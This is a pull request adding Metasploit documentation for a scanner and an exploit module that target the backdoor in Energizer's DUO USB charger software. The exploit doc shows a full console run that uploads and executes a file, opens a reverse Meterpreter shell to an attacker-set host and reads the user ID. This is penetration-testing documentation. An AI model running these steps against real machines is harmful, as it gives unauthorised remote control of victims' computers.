### PR TITLE
energizer duo docs

### DIFF
--- a/documentation/modules/auxiliary/scanner/backdoor/energizer_duo_detect.md
+++ b/documentation/modules/auxiliary/scanner/backdoor/energizer_duo_detect.md
@@ -1,0 +1,27 @@
+## Vulnerable Application
+
+More information can be found on the [Rapid7 Blog](https://community.rapid7.com/community/metasploit/blog/2010/03/08/locate-and-exploit-the-energizer-trojan).
+Energizer's "DUO" USB Battery Charger included a backdoor which listens on port 7777.
+
+The software can be downloaded from the [Wayback Machine](http://web.archive.org/web/20080722134654/www.energizer.com/usbcharger/language/english/download.aspx).
+
+## Verification Steps
+
+  1. Install the vulnerable software
+  2. Start msfconsole
+  3. Do: `use auxiliary/scanner/backdoor/energizer_duo_detect`
+  4. Do: `set rhosts`
+  5. Do: `run`
+
+## Scenarios
+
+  A run against the backdoor
+
+  ```
+    msf > use auxiliary/scanner/backdoor/energizer_duo_detect
+    msf auxiliary(energizer_duo_detect) > set RHOSTS 192.168.0.0/24
+    msf auxiliary(energizer_duo_detect) > set THREADS 256
+    msf auxiliary(energizer_duo_detect) > run
+
+    [*] 192.168.0.132:7777 FOUND: [["F", "AUTOEXEC.BAT"]...
+  ```

--- a/documentation/modules/exploit/windows/backdoor/energizer_duo_payload.md
+++ b/documentation/modules/exploit/windows/backdoor/energizer_duo_payload.md
@@ -1,0 +1,36 @@
+## Vulnerable Application
+
+More information can be found on the [Rapid7 Blog](https://community.rapid7.com/community/metasploit/blog/2010/03/08/locate-and-exploit-the-energizer-trojan).
+Energizer's "DUO" USB Battery Charger included a backdoor which listens on port 7777.
+
+The software can be downloaded from the [Wayback Machine](http://web.archive.org/web/20080722134654/www.energizer.com/usbcharger/language/english/download.aspx).
+
+## Verification Steps
+
+  1. Install the vulnerable software
+  2. Start msfconsole
+  3. Do: `use exploit/windows/backdoor/energizer_duo_payload`
+  4. Do: `set rhost`
+  5. Do: `set payload`
+  6. Do: `exploit`
+
+## Scenarios
+
+  A run against the backdoor
+
+  ```
+    msf > use exploit/windows/backdoor/energizer_duo_payload
+    msf exploit(energizer_duo_payload) > set RHOST 192.168.0.132
+    msf exploit(energizer_duo_payload) > set PAYLOAD windows/meterpreter/reverse_tcp
+    msf exploit(energizer_duo_payload) > set LHOST 192.168.0.228
+    msf exploit(energizer_duo_payload) > exploit
+    
+    [*] Started reverse handler on 192.168.0.228:4444
+    [*] Trying to upload C:\NTL0ZTL4DhVL.exe...
+    [*] Trying to execute C:\NTL0ZTL4DhVL.exe...
+    [*] Sending stage (747008 bytes)
+    [*] Meterpreter session 1 opened (192.168.0.228:4444 -> 192.168.0.132:1200)
+    
+    meterpreter > getuid
+    Server username: XPDEV\Developer
+  ```


### PR DESCRIPTION
Part of #8296 

This adds module docs for the energizer duo backdoor scanner and exploit.

## Verification

List the steps needed to make sure this thing works

- [x] Start `msfconsole`
- [x] use the modules
- [x] `info -d`
- [x] **Verify** spelling and grammar

